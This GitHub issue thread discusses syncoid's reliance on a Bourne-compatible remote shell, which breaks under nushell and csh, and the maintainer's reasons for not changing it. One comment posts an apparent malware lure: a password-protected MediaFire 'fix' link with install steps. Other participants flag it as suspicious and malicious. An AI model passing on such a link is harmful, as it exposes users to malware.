### ISSUE TITLE
The way syncoid is built assumes Bash/POSIX shell

### ISSUE THREAD

**Issue by crabdancing** [jimsalterjrs/sanoid#948]
```
syncoid -r root@mymachine:rpool/data rpool/mymachine-backup/data                                                                                                                         ❌2 2024-08-27 (Aug, Tue) 00:50:09
Error: nu::parser::unknown_flag

  × The `echo` command doesn't have flag `-n`.
   ╭─[source:1:7]
 1 │ echo -n
   ·       ┬
   ·       ╰── unknown flag
   ╰────
  help: Available flags: --help(-h). Use `--help` for more information.

CRITICAL ERROR: ssh connection echo test failed for root@mymachine with exit code 1 at /nix/store/y291afvmzdmff6r02qnhi3c6mcqpws6j-sanoid-2.2.0/bin/.syncoid-wrapped line 1714.
```

It is clearly getting confused here because the `nushell` 'echo' command does not have a `-n` flag. Ideally, syncoid would make explicit the kind of shell it wants (e.g., running `ssh` command with `bash` as a command).

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by lckarssen** [comment]
:warning:  Linking to "a fix" in this way looks rather suspicious. If this is a true fix @ESMELSTEPHANE24, please link to the code in a proper repository like GitHub, GitLab or other so that users here can inspect it before downloading stuff from random websites.

**Comment by jimsalterjrs** [comment]
For the record, syncoid does not assume "bash" it assumes "Bourne, or bourne-compatible" and this is not something that's going to change. Syncoid has no way of knowing what *alternate* shells are available in any given remote machine you sync with, let alone what the paths to them are, so asking for it to "ssh user@host /bin/bash command arguments" instead of "ssh user@host command arguments" is a complete and total no-fly.

I would be open to a patch adding --source-shell and --target-shell arguments to specify a path to a Bourne-compatible shell on each side, but that's about as far as I can see this going--it's not syncoid's fault that FreeBSD went with a very non-Bourne shell as default for several years, nor is it syncoid's fault (or problem) if any particular user prefers a non-Bourne shell of their own for interactive console use. In either case, that's on the person or distro who went off the ranch to deal with.

If this sounds unfair, please note, again, that neither sanoid nor syncoid require BASH, which FreeBSD users (I used to be a primary FreeBSD user, myself; now I mostly just dabble and support) often see as an unwanted Linux-ism. Bourne is not a Linuxism. It's simply a very basic default that can reasonably be expected to be universally available--and when it isn't, it's on whoever made it *unavailable* (or more difficult to access) to deal with.

**Comment by j-baker** [comment]
Hi Jim - yeah, I can see why it'd be frustrating. For me the challenge was the opaque error that you get when you run syncoid against a standard freebsd target (also my first foray into freebsd ever, haha). I think a target-shell argument would have made life easier, for sure.

Alternatively, something that detects the uncompliant situation and warns could be helpful.

**Comment by jimsalterjrs** [comment]
> Alternatively, something that detects the uncompliant situation and warns could be helpful. If I recall correctly, the error was completely opaque in the syncoid logs and I had to decompose the command to figure out what was going on.

This would raise its own nest of hydra heads--how is a simple app going to know that the reason echo -n failed is because there's a nonstandard version of echo installed, rather than... some other reason? And how does it know that "echo" is where the failure will lie?

Things should be getting better soon in FreeBSD-land, because from what I understand it finally ended its long flirtation with the C shell as its default shell. (The C shell was not the default shell **for root** already, and had not been even twenty years ago when I was a daily FreeBSD user--and issues like this one are precisely why; there's too much likely to be firing off from root's crontab that won't respond well to shenanigans with weird shells.)

I mention things like the idea of a --target-shell argument to try to make it clear that I'm not just stonewalling people because I don't care; I just want this tool to be useful as many places as possible, and that sharply limits the number of things I can hardcode in to benefit one platform or another. =)

**Comment by jimsalterjrs** [comment]
> (as it is, I'll have to reinstall bash each time my storage provider reimages).

This is not correct. FreeBSD has /bin/sh built in, and /bin/sh is all you need. There is no need to install Bash or any other shell which is not a part of the FreeBSD system default image!

**Comment by crabdancing** [comment]
@jimsalterjrs If you took issue with some semantic mis-scoping of the issue, don't get why you closed this instead of renaming it. The issue is still present for a lot of people. Why not just do the patch to specify a known working shell?

**Comment by jimsalterjrs** [comment]
> Why not just do the patch to specify a known working shell?

Where might I find this patch? I presume you're not referring to the spam with malicious code that GitHub automatically removed back in August.

If you actually have a patch you'd like to propose, I'll review it. In the meantime, you are requesting a nebulous idea that you've given no idea how to implement. I also have no idea how one would implement a patch that wants a specific shell, which might or might not be available, which might or might not be at any given path, and might or might not know whether some nonstandard shell *is* compatible enough or not.

In the absence of any tangible idea from either you or me, yes, I pretty much need to close this.

**Comment by crabdancing** [comment]
@jimsalterjrs 

I thought it was pretty obvious. Just tell SSH to run a specific shell, then pass commands into that shell. Easy :)
